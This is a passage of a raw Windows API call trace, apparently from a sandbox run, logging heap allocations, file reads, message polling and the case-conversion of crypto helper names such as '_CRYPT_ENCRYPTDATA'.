lpOverlapped=0x0) returned 1 [0041.334] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x3ec2, lpOverlapped=0x0) returned 1 [0041.334] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13ec2) returned 0xac2018 [0041.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13ec2) returned 0x935008 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.338] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13ec2) returned 0xac2018 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0041.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.338] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.339] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13ec2) returned 0xac2018 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0041.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0041.339] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0041.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889670 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0041.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x13ec2) returned 0x948ed8 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.341] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0041.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0041.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.342] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3c8 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.342] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.342] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.343] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0041.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.344] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0041.345] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.345] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.345] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0041.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 